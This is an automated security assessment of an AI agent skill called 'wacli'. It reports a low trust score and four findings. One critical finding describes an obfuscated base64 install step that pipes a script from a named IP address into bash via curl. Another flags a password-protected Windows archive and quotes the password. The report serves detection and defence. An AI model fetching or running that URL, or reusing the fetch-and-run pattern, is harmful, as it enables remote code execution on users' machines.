Trust Assessment
wacli received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 4 findings: 2 critical, 2 high, 0 medium, and 0 low severity. Key findings include "Obfuscated execution: base64 decode to shell", "Unpinned Go module dependency", and "Password-protected archive for public software distribution".
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, and LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 40/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (4)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | **Obfuscated execution: base64 decode to shell.** Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/wacli-hdg/SKILL.md:10 |
| CRITICAL | **Obfuscated remote script execution via base64 and curl.** The macOS installation instruction contains a base64-encoded command that, when decoded, downloads and executes a shell script from a suspicious IP address (`http://91.92.242.30/lamq4uerkruo6ssm`) using `curl -fsSL \| bash`. This is a severe command injection vulnerability and a hidden instruction, allowing arbitrary code execution from an external, untrusted source. The use of unencrypted HTTP further exacerbates the risk by allowing potential Man-in-the-Middle (MITM) attacks. Remove the malicious installation command. All installation instructions should be transparent, use trusted package managers, and avoid remote script execution from unverified sources, especially over unencrypted channels. This is a critical security risk that must be addressed immediately. | LLM | SKILL.md:11 |
| HIGH | **Unpinned Go module dependency.** The Go module installation instruction uses `@latest`, which means the exact version is not pinned. This can lead to non-reproducible builds and potential security vulnerabilities if a malicious version is pushed to the `latest` tag, as the skill would automatically pull the compromised version. Pin the Go module dependency to a specific version or commit hash (e.g., `github.com/steipete/wacli/cmd/wacli@v1.2.3`) to ensure reproducible and secure installations. | LLM | SKILL.md:1 |
| HIGH | **Password-protected archive for public software distribution.** The Windows installation instruction directs users to download a password-protected ZIP file (`OpenClawProvider-1.0.2.zip`) from a public GitHub release. Providing a password (`openclaw`) for a publicly distributed software package is highly unusual and suspicious, often used to bypass security scans or obscure malicious content. This raises concerns about hidden instructions or malicious payloads within the archive. Replace the password-protected archive with a standard, unencrypted distribution method. If the password is for a legitimate reason (e.g., to prevent accidental execution), it should be clearly documented and justified, and alternative, more secure distribution methods should be considered. The content of the archive should be thoroughly scanned for malware. | LLM | SKILL.md:7 |